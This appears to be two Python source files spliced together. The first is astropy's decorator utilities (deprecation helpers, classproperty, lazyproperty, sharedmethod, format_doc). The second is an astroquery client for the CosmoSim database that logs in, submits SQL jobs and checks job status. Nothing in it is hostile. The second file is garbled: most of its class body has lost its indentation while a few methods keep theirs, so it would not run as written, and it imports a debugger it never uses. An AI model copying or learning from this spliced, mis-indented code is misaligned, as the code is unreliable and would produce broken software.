        This won't work for extension classes because these can't be modified
        in-place and the alternatives don't work in the general case:
        - Using a new class that looks and behaves like the original doesn't
        work because the __new__ method of extension types usually makes sure
        that it's the same class or a subclass.
        - Subclassing the class and return the subclass can lead to problems
        with pickle and will look weird in the Sphinx docs.
        """
        cls.__doc__ = deprecate_doc(cls.__doc__, message)
        if cls.__new__ is object.__new__:
            cls.__init__ = deprecate_function(get_function(cls.__init__),
                                              message, warning_type)
        else:
            cls.__new__ = deprecate_function(get_function(cls.__new__),
                                             message, warning_type)
        return cls
    def deprecate(obj, message=message, name=name, alternative=alternative,
                  pending=pending, warning_type=warning_type):
        # Determine a friendly name for the kind of object being deprecated,
        # used in the default warning text.
        if obj_type is None:
            if isinstance(obj, type):
                obj_type_name = 'class'
            elif inspect.isfunction(obj):
                obj_type_name = 'function'
            elif inspect.ismethod(obj) or isinstance(obj, method_types):
                obj_type_name = 'method'
            else:
                obj_type_name = 'object'
        else:
            obj_type_name = obj_type
        if not name:
            name = get_function(obj).__name__
        altmessage = ''
        # An empty message -- or the decorated object itself, when the
        # decorator was applied without parentheses -- selects the default
        # deprecation text.
        if not message or type(message) is type(deprecate):
            if pending:
                message = ('The {func} {obj_type} will be deprecated in a '
                           'future version.')
            else:
                message = ('The {func} {obj_type} is deprecated and may '
                           'be removed in a future version.')
            if alternative:
                altmessage = f'\n Use {alternative} instead.'
        message = ((message.format(**{
            'func': name,
            'name': name,
            'alternative': alternative,
            'obj_type': obj_type_name})) +
            altmessage)
        if isinstance(obj, type):
            return deprecate_class(obj, message, warning_type)
        else:
            return deprecate_function(obj, message, warning_type)
    # Support bare ``@deprecated`` usage: in that case the decorated object
    # arrives in ``message``.
    if type(message) is type(deprecate):
        return deprecate(message)
    return deprecate
def deprecated_attribute(name, since, message=None, alternative=None,
                         pending=False, warning_type=AstropyDeprecationWarning):
    """
    Used to mark a public attribute as deprecated. This creates a
    property that will warn when the given attribute name is accessed.
    To prevent the warning (i.e. for internal code), use the private
    name for the attribute by prepending an underscore
    (i.e. ``self._name``).
    Parameters
    ----------
    name : str
        The name of the deprecated attribute.
    since : str
        The release at which this API became deprecated. This is
        required.
    message : str, optional
        Override the default deprecation message. The format
        specifier ``name`` may be used for the name of the attribute,
        and ``alternative`` may be used in the deprecation message
        to insert the name of an alternative to the deprecated
        function.
    alternative : str, optional
        An alternative attribute that the user may use in place of the
        deprecated attribute. The deprecation warning will tell the
        user about this alternative if provided.
    pending : bool, optional
        If True, uses a AstropyPendingDeprecationWarning instead of
        ``warning_type``.
    warning_type : warning
        Warning to be issued.
        Default is `~astropy.utils.exceptions.AstropyDeprecationWarning`.
    Examples
    --------
    ::
        class MyClass:
            # Mark the old_name as deprecated
            old_name = misc.deprecated_attribute('old_name', '0.1')
            def method(self):
                self._old_name = 42
    """
    private_name = '_' + name
    # Build the decorator once so the getter, setter, and deleter share the
    # exact same deprecation behavior.
    # BUG FIX: ``message``, ``alternative`` and ``pending`` were previously
    # accepted but never forwarded to `deprecated`, so callers' overrides
    # were silently ignored.  They are now passed through (``None`` maps to
    # the empty-string defaults `deprecated` expects).
    specifier = deprecated(since, name=name, obj_type='attribute',
                           message=message or '',
                           alternative=alternative or '',
                           pending=pending, warning_type=warning_type)
    @specifier
    def get(self):
        return getattr(self, private_name)
    @specifier
    def set(self, val):
        setattr(self, private_name, val)
    @specifier
    def delete(self):
        delattr(self, private_name)
    return property(get, set, delete)
def deprecated_renamed_argument(old_name, new_name, since,
                                arg_in_kwargs=False, relax=False,
                                pending=False,
                                warning_type=AstropyDeprecationWarning,
                                alternative=''):
    """Deprecate a _renamed_ or _removed_ function argument.
    The decorator assumes that the argument with the ``old_name`` was removed
    from the function signature and the ``new_name`` replaced it at the
    **same position** in the signature.  If the ``old_name`` argument is
    given when calling the decorated function the decorator will catch it and
    issue a deprecation warning and pass it on as ``new_name`` argument.
    Parameters
    ----------
    old_name : str or list/tuple thereof
        The old name of the argument.
    new_name : str or list/tuple thereof or `None`
        The new name of the argument. Set this to `None` to remove the
        argument ``old_name`` instead of renaming it.
    since : str or number or list/tuple thereof
        The release at which the old argument became deprecated.
    arg_in_kwargs : bool or list/tuple thereof, optional
        If the argument is not a named argument (for example it
        was meant to be consumed by ``**kwargs``) set this to
        ``True``. Otherwise the decorator will throw an Exception
        if the ``new_name`` cannot be found in the signature of
        the decorated function.
        Default is ``False``.
    relax : bool or list/tuple thereof, optional
        If ``False`` a ``TypeError`` is raised if both ``new_name`` and
        ``old_name`` are given.  If ``True`` the value for ``new_name`` is used
        and a Warning is issued.
        Default is ``False``.
    pending : bool or list/tuple thereof, optional
        If ``True`` this will hide the deprecation warning and ignore the
        corresponding ``relax`` parameter value.
        Default is ``False``.
    warning_type : warning
        Warning to be issued.
        Default is `~astropy.utils.exceptions.AstropyDeprecationWarning`.
    alternative : str, optional
        An alternative function or class name that the user may use in
        place of the deprecated object if ``new_name`` is None. The deprecation
        warning will tell the user about this alternative if provided.
    Raises
    ------
    TypeError
        If the new argument name cannot be found in the function
        signature and arg_in_kwargs was False or if it is used to
        deprecate the name of the ``*args``-, ``**kwargs``-like arguments.
        At runtime such an Error is raised if both the new_name
        and old_name were specified when calling the function and
        "relax=False".
    Notes
    -----
    The decorator should be applied to a function where the **name**
    of an argument was changed but it applies the same logic.
    .. warning::
        If ``old_name`` is a list or tuple the ``new_name`` and ``since`` must
        also be a list or tuple with the same number of entries. ``relax`` and
        ``arg_in_kwarg`` can be a single bool (applied to all) or also a
        list/tuple with the same number of entries like ``new_name``, etc.
    Examples
    --------
    The deprecation warnings are not shown in the following examples.
    To deprecate a positional or keyword argument::
        >>> from astropy.utils.decorators import deprecated_renamed_argument
        >>> @deprecated_renamed_argument('sig', 'sigma', '1.0')
        ... def test(sigma):
        ...     return sigma
        >>> test(2)
        2
        >>> test(sigma=2)
        2
        >>> test(sig=2)  # doctest: +SKIP
        2
    To deprecate an argument caught inside the ``**kwargs`` the
    ``arg_in_kwargs`` has to be set::
        >>> @deprecated_renamed_argument('sig', 'sigma', '1.0',
        ...                             arg_in_kwargs=True)
        ... def test(**kwargs):
        ...     return kwargs['sigma']
        >>> test(sigma=2)
        2
        >>> test(sig=2)  # doctest: +SKIP
        2
    By default providing the new and old keyword will lead to an Exception. If
    a Warning is desired set the ``relax`` argument::
        >>> @deprecated_renamed_argument('sig', 'sigma', '1.0', relax=True)
        ... def test(sigma):
        ...     return sigma
        >>> test(sig=2)  # doctest: +SKIP
        2
    It is also possible to replace multiple arguments. The ``old_name``,
    ``new_name`` and ``since`` have to be `tuple` or `list` and contain the
    same number of entries::
        >>> @deprecated_renamed_argument(['a', 'b'], ['alpha', 'beta'],
        ...                             ['1.0', 1.2])
        ... def test(alpha, beta):
        ...     return alpha, beta
        >>> test(a=2, b=3)  # doctest: +SKIP
        (2, 3)
    In this case ``arg_in_kwargs`` and ``relax`` can be a single value (which
    is applied to all renamed arguments) or must also be a `tuple` or `list`
    with values for each of the arguments.
    """
    cls_iter = (list, tuple)
    # Normalize every per-argument option to an equal-length sequence so the
    # decorator body can always loop over index ``i``.
    if isinstance(old_name, cls_iter):
        n = len(old_name)
        # Assume that new_name and since are correct (tuple/list with the
        # appropriate length) in the spirit of the "consenting adults". But the
        # optional parameters may not be set, so if these are not iterables
        # wrap them.
        if not isinstance(arg_in_kwargs, cls_iter):
            arg_in_kwargs = [arg_in_kwargs] * n
        if not isinstance(relax, cls_iter):
            relax = [relax] * n
        if not isinstance(pending, cls_iter):
            pending = [pending] * n
    else:
        # To allow a uniform approach later on, wrap all arguments in lists.
        n = 1
        old_name = [old_name]
        new_name = [new_name]
        since = [since]
        arg_in_kwargs = [arg_in_kwargs]
        relax = [relax]
        pending = [pending]
    def decorator(function):
        # The named arguments of the function.
        arguments = signature(function).parameters
        keys = list(arguments.keys())
        # ``position[i]`` is the positional index of the replacement argument
        # (or None for keyword-only / **kwargs-consumed arguments); computed
        # once at decoration time, used at every call.
        position = [None] * n
        for i in range(n):
            # Determine the position of the argument.
            if arg_in_kwargs[i]:
                pass
            else:
                if new_name[i] is None:
                    param = arguments[old_name[i]]
                elif new_name[i] in arguments:
                    param = arguments[new_name[i]]
                # In case the argument is not found in the list of arguments
                # the only remaining possibility is that it should be caught
                # by some kind of **kwargs argument.
                # This case has to be explicitly specified, otherwise throw
                # an exception!
                else:
                    raise TypeError(
                        f'"{new_name[i]}" was not specified in the function '
                        'signature. If it was meant to be part of '
                        '"**kwargs" then set "arg_in_kwargs" to "True"')
                # There are several possibilities now:
                # 1.) Positional or keyword argument:
                if param.kind == param.POSITIONAL_OR_KEYWORD:
                    if new_name[i] is None:
                        position[i] = keys.index(old_name[i])
                    else:
                        position[i] = keys.index(new_name[i])
                # 2.) Keyword only argument:
                elif param.kind == param.KEYWORD_ONLY:
                    # These cannot be specified by position.
                    position[i] = None
                # 3.) positional-only argument, varargs, varkwargs or some
                #     unknown type:
                else:
                    raise TypeError(f'cannot replace argument "{new_name[i]}" '
                                    f'of kind {repr(param.kind)}.')
        @functools.wraps(function)
        def wrapper(*args, **kwargs):
            for i in range(n):
                message = (f'"{old_name[i]}" was deprecated in version '
                           f'{since[i]} and will be removed in a future '
                           'version. ')
                # The only way to have oldkeyword inside the function is
                # that it is passed as kwarg because the oldkeyword
                # parameter was renamed to newkeyword.
                if old_name[i] in kwargs:
                    value = kwargs.pop(old_name[i])
                    # Display the deprecation warning only when it's not
                    # pending.
                    if not pending[i]:
                        if new_name[i] is not None:
                            message += f'Use argument "{new_name[i]}" instead.'
                        elif alternative:
                            message += f'\n        Use {alternative} instead.'
                        warnings.warn(message, warning_type, stacklevel=2)
                    # Check if the newkeyword was given as well.
                    newarg_in_args = (position[i] is not None and
                                      len(args) > position[i])
                    newarg_in_kwargs = new_name[i] in kwargs
                    if newarg_in_args or newarg_in_kwargs:
                        if not pending[i]:
                            # If both are given print a Warning if relax is
                            # True or raise an Exception is relax is False.
                            if relax[i]:
                                warnings.warn(
                                    f'"{old_name[i]}" and "{new_name[i]}" '
                                    'keywords were set. '
                                    f'Using the value of "{new_name[i]}".',
                                    AstropyUserWarning)
                            else:
                                raise TypeError(
                                    f'cannot specify both "{old_name[i]}" and '
                                    f'"{new_name[i]}".')
                    else:
                        # Pass the value of the old argument with the
                        # name of the new argument to the function
                        if new_name[i] is not None:
                            kwargs[new_name[i]] = value
                        # If old argument has no replacement, cast it back.
                        # https://github.com/astropy/astropy/issues/9914
                        else:
                            kwargs[old_name[i]] = value
                # Deprecated keyword without replacement is given as
                # positional argument.
                elif (not pending[i] and not new_name[i] and position[i] and
                      len(args) > position[i]):
                    if alternative:
                        message += f'\n        Use {alternative} instead.'
                    warnings.warn(message, warning_type, stacklevel=2)
            return function(*args, **kwargs)
        return wrapper
    return decorator
# TODO: This can still be made to work for setters by implementing an
# accompanying metaclass that supports it; we just don't need that right this
# second
class classproperty(property):
    """
    Similar to `property`, but allows class-level properties.  That is,
    a property whose getter is like a `classmethod`.
    The wrapped method may explicitly use the `classmethod` decorator (which
    must become before this decorator), or the `classmethod` may be omitted
    (it is implicit through use of this decorator).
    .. note::
        classproperty only works for *read-only* properties.  It does not
        currently allow writeable/deletable properties, due to subtleties of how
        Python descriptors work.  In order to implement such properties on a class
        a metaclass for that class must be implemented.
    Parameters
    ----------
    fget : callable
        The function that computes the value of this property (in particular,
        the function when this is used as a decorator) a la `property`.
    doc : str, optional
        The docstring for the property--by default inherited from the getter
        function.
    lazy : bool, optional
        If True, caches the value returned by the first call to the getter
        function, so that it is only called once (used for lazy evaluation
        of an attribute).  This is analogous to `lazyproperty`.  The ``lazy``
        argument can also be used when `classproperty` is used as a decorator
        (see the third example below).  When used in the decorator syntax this
        *must* be passed in as a keyword argument.
    Examples
    --------
    ::
        >>> class Foo:
        ...     _bar_internal = 1
        ...     @classproperty
        ...     def bar(cls):
        ...         return cls._bar_internal + 1
        ...
        >>> Foo.bar
        2
        >>> foo_instance = Foo()
        >>> foo_instance.bar
        2
        >>> foo_instance._bar_internal = 2
        >>> foo_instance.bar  # Ignores instance attributes
        2
    As previously noted, a `classproperty` is limited to implementing
    read-only attributes::
        >>> class Foo:
        ...     _bar_internal = 1
        ...     @classproperty
        ...     def bar(cls):
        ...         return cls._bar_internal
        ...     @bar.setter
        ...     def bar(cls, value):
        ...         cls._bar_internal = value
        ...
        Traceback (most recent call last):
        ...
        NotImplementedError: classproperty can only be read-only; use a
        metaclass to implement modifiable class-level properties
    When the ``lazy`` option is used, the getter is only called once::
        >>> class Foo:
        ...     @classproperty(lazy=True)
        ...     def bar(cls):
        ...         print("Performing complicated calculation")
        ...         return 1
        ...
        >>> Foo.bar
        Performing complicated calculation
        1
        >>> Foo.bar
        1
    If a subclass inherits a lazy `classproperty` the property is still
    re-evaluated for the subclass::
        >>> class FooSub(Foo):
        ...     pass
        ...
        >>> FooSub.bar
        Performing complicated calculation
        1
        >>> FooSub.bar
        1
    """
    def __new__(cls, fget=None, doc=None, lazy=False):
        # Support the ``classproperty(lazy=True)`` decorator-factory form:
        # with no ``fget`` yet, return a wrapper that finishes construction
        # when applied to the actual getter.
        if fget is None:
            # Being used as a decorator--return a wrapper that implements
            # decorator syntax
            def wrapper(func):
                return cls(func, lazy=lazy)
            return wrapper
        return super().__new__(cls)
    def __init__(self, fget, doc=None, lazy=False):
        self._lazy = lazy
        if lazy:
            self._lock = threading.RLock()   # Protects _cache
            # Per-class cache of computed values, keyed by the owner class so
            # subclasses are re-evaluated independently.
            self._cache = {}
        fget = self._wrap_fget(fget)
        super().__init__(fget=fget, doc=doc)
        # There is a buglet in Python where self.__doc__ doesn't
        # get set properly on instances of property subclasses if
        # the doc argument was used rather than taking the docstring
        # from fget
        # Related Python issue: https://bugs.python.org/issue24766
        if doc is not None:
            self.__doc__ = doc
    def __get__(self, obj, objtype):
        if self._lazy:
            # Double-checked locking: fast path without the lock, then
            # re-check under the lock before computing.
            val = self._cache.get(objtype, _NotFound)
            if val is _NotFound:
                with self._lock:
                    # Check if another thread initialised before we locked.
                    val = self._cache.get(objtype, _NotFound)
                    if val is _NotFound:
                        val = self.fget.__wrapped__(objtype)
                        self._cache[objtype] = val
        else:
            # The base property.__get__ will just return self here;
            # instead we pass objtype through to the original wrapped
            # function (which takes the class as its sole argument)
            val = self.fget.__wrapped__(objtype)
        return val
    def getter(self, fget):
        return super().getter(self._wrap_fget(fget))
    def setter(self, fset):
        raise NotImplementedError(
            "classproperty can only be read-only; use a metaclass to "
            "implement modifiable class-level properties")
    def deleter(self, fdel):
        raise NotImplementedError(
            "classproperty can only be read-only; use a metaclass to "
            "implement modifiable class-level properties")
    @staticmethod
    def _wrap_fget(orig_fget):
        # Accept either a plain function or one already wrapped in
        # ``classmethod``; either way the getter receives the class.
        if isinstance(orig_fget, classmethod):
            orig_fget = orig_fget.__func__
        # Using stock functools.wraps instead of the fancier version
        # found later in this module, which is overkill for this purpose
        @functools.wraps(orig_fget)
        def fget(obj):
            return orig_fget(obj.__class__)
        return fget
# Adapted from the recipe at
# http://code.activestate.com/recipes/363602-lazy-property-evaluation
class lazyproperty(property):
    """
    Works similarly to property(), but computes the value only once.
    This essentially memorizes the value of the property by storing the result
    of its computation in the ``__dict__`` of the object instance.  This is
    useful for computing the value of some property that should otherwise be
    invariant.  For example::
        >>> class LazyTest:
        ...     @lazyproperty
        ...     def complicated_property(self):
        ...         print('Computing the value for complicated_property...')
        ...         return 42
        ...
        >>> lt = LazyTest()
        >>> lt.complicated_property
        Computing the value for complicated_property...
        42
        >>> lt.complicated_property
        42
    As the example shows, the second time ``complicated_property`` is accessed,
    the ``print`` statement is not executed.  Only the return value from the
    first access off ``complicated_property`` is returned.
    By default, a setter and deleter are used which simply overwrite and
    delete, respectively, the value stored in ``__dict__``. Any user-specified
    setter or deleter is executed before executing these default actions.
    The one exception is that the default setter is not run if the user setter
    already sets the new value in ``__dict__`` and returns that value and the
    returned value is not ``None``.
    """
    def __init__(self, fget, fset=None, fdel=None, doc=None):
        super().__init__(fget, fset, fdel, doc)
        # The cached value lives in the instance __dict__ under the getter's
        # name; the data-descriptor protocol is bypassed on later reads only
        # through this lookup.
        self._key = self.fget.__name__
        self._lock = threading.RLock()
    def __get__(self, obj, owner=None):
        try:
            obj_dict = obj.__dict__
            val = obj_dict.get(self._key, _NotFound)
            if val is _NotFound:
                # Double-checked locking so concurrent first accesses compute
                # the value exactly once.
                with self._lock:
                    # Check if another thread beat us to it.
                    val = obj_dict.get(self._key, _NotFound)
                    if val is _NotFound:
                        val = self.fget(obj)
                        obj_dict[self._key] = val
            return val
        except AttributeError:
            # Class-level access (obj is None) has no __dict__ to consult;
            # return the descriptor itself like plain ``property`` does.
            if obj is None:
                return self
            raise
    def __set__(self, obj, val):
        obj_dict = obj.__dict__
        if self.fset:
            ret = self.fset(obj, val)
            if ret is not None and obj_dict.get(self._key) is ret:
                # By returning the value set the setter signals that it
                # took over setting the value in obj.__dict__; this
                # mechanism allows it to override the input value
                return
        obj_dict[self._key] = val
    def __delete__(self, obj):
        if self.fdel:
            self.fdel(obj)
        obj.__dict__.pop(self._key, None)    # Delete if present
class sharedmethod(classmethod):
    """
    This is a method decorator that allows both an instancemethod and a
    `classmethod` to share the same name.
    When using `sharedmethod` on a method defined in a class's body, it
    may be called on an instance, or on a class.  In the former case it
    behaves like a normal instance method (a reference to the instance is
    automatically passed as the first ``self`` argument of the method)::
        >>> class Example:
        ...     @sharedmethod
        ...     def identify(self, *args):
        ...         print('self was', self)
        ...         print('additional args were', args)
        ...
        >>> ex = Example()
        >>> ex.identify(1, 2)
        self was <astropy.utils.decorators.Example object at 0x...>
        additional args were (1, 2)
    In the latter case, when the `sharedmethod` is called directly from a
    class, it behaves like a `classmethod`::
        >>> Example.identify(3, 4)
        self was <class 'astropy.utils.decorators.Example'>
        additional args were (3, 4)
    This also supports a more advanced usage, where the `classmethod`
    implementation can be written separately.  If the class's *metaclass*
    has a method of the same name as the `sharedmethod`, the version on
    the metaclass is delegated to::
        >>> class ExampleMeta(type):
        ...     def identify(self):
        ...         print('this implements the {0}.identify '
        ...               'classmethod'.format(self.__name__))
        ...
        >>> class Example(metaclass=ExampleMeta):
        ...     @sharedmethod
        ...     def identify(self):
        ...         print('this implements the instancemethod')
        ...
        >>> Example().identify()
        this implements the instancemethod
        >>> Example.identify()
        this implements the Example.identify classmethod
    """
    def __get__(self, obj, objtype=None):
        # Instance access: behave exactly like a normal bound method.
        if obj is not None:
            return self._make_method(self.__func__, obj)
        # Class access: prefer a same-named implementation on the metaclass
        # (the "separately written classmethod"); otherwise fall back to the
        # wrapped function bound to the class itself, like `classmethod`.
        metacls = type(objtype)
        candidate = getattr(metacls, self.__func__.__name__, None)
        target = candidate if callable(candidate) else self.__func__
        return self._make_method(target, objtype)
    @staticmethod
    def _make_method(func, instance):
        # Manually bind ``func`` to ``instance`` (an object or a class).
        return types.MethodType(func, instance)
def format_doc(docstring, *args, **kwargs):
    """
    Replaces the docstring of the decorated object and then formats it.
    The formatting works like :meth:`str.format` and if the decorated object
    already has a docstring this docstring can be included in the new
    documentation if you use the ``{__doc__}`` placeholder.
    Its primary use is for reusing a *long* docstring in multiple functions
    when it is the same or only slightly different between them.
    Parameters
    ----------
    docstring : str or object or None
        The docstring that will replace the docstring of the decorated
        object. If it is an object like a function or class it will
        take the docstring of this object. If it is a string it will use the
        string itself. One special case is if the string is ``None`` then
        it will use the decorated functions docstring and formats it.
    args :
        passed to :meth:`str.format`.
    kwargs :
        passed to :meth:`str.format`. If the function has a (not empty)
        docstring the original docstring is added to the kwargs with the
        keyword ``'__doc__'``.
    Raises
    ------
    ValueError
        If the ``docstring`` (or interpreted docstring if it was ``None``
        or not a string) is empty.
    IndexError, KeyError
        If a placeholder in the (interpreted) ``docstring`` was not filled. see
        :meth:`str.format` for more information.
    Notes
    -----
    Using this decorator allows, for example Sphinx, to parse the
    correct docstring.
    Examples
    --------
    Replacing the current docstring is very easy::
        >>> from astropy.utils.decorators import format_doc
        >>> @format_doc('''Perform num1 + num2''')
        ... def add(num1, num2):
        ...     return num1+num2
        ...
        >>> help(add) # doctest: +SKIP
        Help on function add in module __main__:
        <BLANKLINE>
        add(num1, num2)
            Perform num1 + num2
    sometimes instead of replacing you only want to add to it::
        >>> doc = '''
        ...       {__doc__}
        ...       Parameters
        ...       ----------
        ...       num1, num2 : Numbers
        ...       Returns
        ...       -------
        ...       result: Number
        ...       '''
        >>> @format_doc(doc)
        ... def add(num1, num2):
        ...     '''Perform addition.'''
        ...     return num1+num2
        ...
        >>> help(add) # doctest: +SKIP
        Help on function add in module __main__:
        <BLANKLINE>
        add(num1, num2)
            Perform addition.
            Parameters
            ----------
            num1, num2 : Numbers
            Returns
            -------
            result : Number
    in case one might want to format it further::
        >>> doc = '''
        ...       Perform {0}.
        ...       Parameters
        ...       ----------
        ...       num1, num2 : Numbers
        ...       Returns
        ...       -------
        ...       result: Number
        ...           result of num1 {op} num2
        ...       {__doc__}
        ...       '''
        >>> @format_doc(doc, 'addition', op='+')
        ... def add(num1, num2):
        ...     return num1+num2
        ...
        >>> @format_doc(doc, 'subtraction', op='-')
        ... def subtract(num1, num2):
        ...     '''Notes: This one has additional notes.'''
        ...     return num1-num2
        ...
        >>> help(add) # doctest: +SKIP
        Help on function add in module __main__:
        <BLANKLINE>
        add(num1, num2)
            Perform addition.
            Parameters
            ----------
            num1, num2 : Numbers
            Returns
            -------
            result : Number
                result of num1 + num2
        >>> help(subtract) # doctest: +SKIP
        Help on function subtract in module __main__:
        <BLANKLINE>
        subtract(num1, num2)
            Perform subtraction.
            Parameters
            ----------
            num1, num2 : Numbers
            Returns
            -------
            result : Number
                result of num1 - num2
            Notes : This one has additional notes.
    These methods can be combined an even taking the docstring from another
    object is possible as docstring attribute. You just have to specify the
    object::
        >>> @format_doc(add)
        ... def another_add(num1, num2):
        ...     return num1 + num2
        ...
        >>> help(another_add) # doctest: +SKIP
        Help on function another_add in module __main__:
        <BLANKLINE>
        another_add(num1, num2)
            Perform addition.
            Parameters
            ----------
            num1, num2 : Numbers
            Returns
            -------
            result : Number
                result of num1 + num2
    But be aware that this decorator *only* formats the given docstring not
    the strings passed as ``args`` or ``kwargs`` (not even the original
    docstring)::
        >>> @format_doc(doc, 'addition', op='+')
        ... def yet_another_add(num1, num2):
        ...    '''This one is good for {0}.'''
        ...    return num1 + num2
        ...
        >>> help(yet_another_add) # doctest: +SKIP
        Help on function yet_another_add in module __main__:
        <BLANKLINE>
        yet_another_add(num1, num2)
            Perform addition.
            Parameters
            ----------
            num1, num2 : Numbers
            Returns
            -------
            result : Number
                result of num1 + num2
            This one is good for {0}.
    To work around it you could specify the docstring to be ``None``::
        >>> @format_doc(None, 'addition')
        ... def last_add_i_swear(num1, num2):
        ...     '''This one is good for {0}.'''
        ...     return num1 + num2
        ...
        >>> help(last_add_i_swear) # doctest: +SKIP
        Help on function last_add_i_swear in module __main__:
        <BLANKLINE>
        last_add_i_swear(num1, num2)
            This one is good for addition.
    Using it with ``None`` as docstring allows to use the decorator twice
    on an object to first parse the new docstring and then to parse the
    original docstring or the ``args`` and ``kwargs``.
    """
    def set_docstring(obj):
        if docstring is None:
            # None means: use the objects __doc__
            doc = obj.__doc__
            # Delete documentation in this case so we don't end up with
            # awkwardly self-inserted docs.
            obj.__doc__ = None
        elif isinstance(docstring, str):
            # String: use the string that was given
            doc = docstring
        else:
            # Something else: Use the __doc__ of this
            doc = docstring.__doc__
        if not doc:
            # In case the docstring is empty it's probably not what was wanted.
            # BUG FIX: the previous message ("docstring must be a string or
            # containing a docstring that is not empty.") was ungrammatical
            # and confusing.
            raise ValueError('docstring must be a non-empty string or an '
                             'object with a non-empty docstring.')
        # If the original has a not-empty docstring append it to the format
        # kwargs.
        kwargs['__doc__'] = obj.__doc__ or ''
        obj.__doc__ = doc.format(*args, **kwargs)
        return obj
    return set_docstring
|
from __future__ import print_function
import requests
import sys
from bs4 import BeautifulSoup
import keyring
import getpass
import logging
import threading
import ipdb
# Astropy imports
from astropy.table import Table
import astropy.units as u
import astropy.coordinates as coord
import astropy.io.votable as votable
from astropy.io import fits
from astropy.io import votable
import astropy.utils.data as aud
# Astroquery imports
from ..utils import commons
from ..query import QueryWithLogin
from . import conf
__all__ = ['CosmoSim']
class CosmoSim(QueryWithLogin):
QUERY_URL = conf.query_url
SCHEMA_URL = conf.schema_url
TIMEOUT = conf.timeout
    def __init__(self):
        """Initialize the query class with a fresh HTTP session."""
        super(CosmoSim, self).__init__()
        self.session = requests.session()
def _login(self, username, password=None):
self.session = requests.session()
self.username = username
# Get password from keyring or prompt
password_from_keyring = keyring.get_password("astroquery:www.cosmosim.org", self.username)
if password_from_keyring is None:
logging.warning("No password was found in the keychain for the provided username.")
# Check if running from scipt or interactive python session
import __main__ as main
# For script
if hasattr(main,'__file__'):
assert password, "No password provided."
self.password = password
# For interactive session
else:
self.password = getpass.getpass("{0}, enter your CosmoSim password:\n".format(self.username))
else:
self.password = password_from_keyring
# Authenticate
print("Authenticating {0} on www.cosmosim.org...".format(self.username))
authenticated = self.session.post(CosmoSim.QUERY_URL,auth=(self.username,self.password))
if authenticated.status_code == 200:
print("Authentication successful!")
elif authenticated.status_code == 401:
print("Authentication failed!")
elif authenticated.status_code == 503:
print("Service Temporarily Unavailable...")
# Generating dictionary of existing tables
self._existing_tables()
if authenticated.status_code == 200 and password_from_keyring is None:
keyring.set_password("astroquery:www.cosmosim.org", self.username, self.password)
# Delete job
soup = BeautifulSoup(authenticated.content)
self.delete_job(jobid="{}".format(soup.find("uws:jobid").string),squash=True)
return authenticated
def logout(self):
del self.session
del self.username
del self.password
def run_sql_query(self, query_string,tablename=None,queue=None):
"""
Public function which sends a POST request containing the sql query string.
Parameters
----------
query_string : string
The sql query to be sent to the CosmoSim.org server.
tablename : string
The name of the table for which the query data will be stored under. If left blank or if it already exists, one will be generated automatically.
Returns
-------
result : jobid
The jobid of the query
"""
self._existing_tables()
if not queue:
queue = 'short'
if tablename in self.table_dict.values():
result = self.session.post(CosmoSim.QUERY_URL,auth=(self.username,self.password),data={'query':query_string,'phase':'run','queue':queue})
soup = BeautifulSoup(result.content)
gen_tablename = str(soup.find(id="table").string)
logging.warning("Table name {} is already taken.".format(tablename))
print("Generated table name: {}".format(gen_tablename))
elif tablename is None:
result = self.session.post(CosmoSim.QUERY_URL,auth=(self.username,self.password),data={'query':query_string,'phase':'run','queue':queue})
else:
result = self.session.post(CosmoSim.QUERY_URL,auth=(self.username,self.password),data={'query':query_string,'table':'{}'.format(tablename),'phase':'run','queue':queue})
soup = BeautifulSoup(result.content)
self.current_job = str(soup.find("uws:jobid").string)
print("Job created: {}".format(self.current_job))
self._existing_tables()
return self.current_job
def _existing_tables(self):
    """
    Internal function which builds a dictionary of the tables already in use for a given set of user credentials. Keys are jobids and values are the tables which are stored under those keys.
    """
    checkalljobs = self.check_all_jobs()
    # Only jobs that finished or are still running can own a table.
    completed_jobs = [key for key in self.job_dict.keys() if self.job_dict[key] in ['COMPLETED','EXECUTING']]
    soup = BeautifulSoup(checkalljobs.content)
    self.table_dict={}
    for i in soup.find_all("uws:jobref"):
        jobid = i.get('xlink:href').split('/')[-1]
        if jobid in completed_jobs:
            self.table_dict[jobid] = '{}'.format(i.get('id'))
def check_query_status(self,jobid=None):
    """
    A public function which sends an http GET request for a given jobid, and checks the server status. If no jobid is provided, it uses the most recent query (if one exists).

    Parameters
    ----------
    jobid : string
        The jobid of the sql query. If no jobid is given, it attempts to use the most recent job (if it exists in this session).

    Returns
    -------
    result : content of 'requests.models.Response' object
        The requests response phase

    Raises
    ------
    AttributeError
        If no jobid is given and no query has been run in this session.
    """
    if jobid is None:
        # Replaces a dead try/except that re-raised a message-less
        # AttributeError: fail fast with an explanatory message instead.
        if not hasattr(self, 'current_job'):
            raise AttributeError("No jobid given and no job has been run "
                                 "in this session.")
        jobid = self.current_job
    response = self.session.get(CosmoSim.QUERY_URL+'/{}'.format(jobid)+'/phase',auth=(self.username,self.password),data={'print':'b'})
    print("Job {}: {}".format(jobid,response.content))
    return response.content
def check_all_jobs(self):
    """
    Public function which builds a dictionary whose keys are each jobid for a given set of user credentials and whose values are the phase status (e.g. - EXECUTING,COMPLETED,PENDING,ERROR).

    Returns
    -------
    checkalljobs : 'requests.models.Response' object
        The requests response for the GET request for finding all existing jobs.
    """
    checkalljobs = self.session.get(CosmoSim.QUERY_URL,auth=(self.username,self.password),params={'print':'b'})
    self.job_dict={}
    soup = BeautifulSoup(checkalljobs.content)
    for i in soup.find_all("uws:jobref"):
        i_phase = str(i.find('uws:phase').string)
        if i_phase in ['COMPLETED','EXECUTING','ABORTED','ERROR']:
            # Finished/active jobs are keyed by the jobid from the xlink
            # URL; other phases fall back to the element id attribute.
            self.job_dict['{}'.format(i.get('xlink:href').split('/')[-1])] = i_phase
        else:
            self.job_dict['{}'.format(i.get('id'))] = i_phase
    # Inspect the caller's name so that internal bookkeeping calls do not
    # print the whole job dictionary to the terminal.
    frame = sys._getframe(1)
    do_not_print_job_dict = ['completed_job_info','delete_all_jobs','_existing_tables','delete_job','download'] # list of methods which use check_all_jobs() for which I would not like job_dict to be printed to the terminal
    if frame.f_code.co_name in do_not_print_job_dict:
        return checkalljobs
    else:
        print(self.job_dict)
        return checkalljobs
def completed_job_info(self,jobid=None,output=False):
    """
    A public function which sends an http GET request for a given jobid with phase COMPLETED, and returns a list containing the response object. If no jobid is provided, a list of all responses with phase COMPLETED is generated.

    Parameters
    ----------
    jobid : string
        The jobid of the sql query.
    output : bool
        Print output of response(s) to the terminal

    Returns
    -------
    result : list
        A list of response object(s); empty if the given jobid is not in
        the COMPLETED phase.
    """
    self.check_all_jobs()
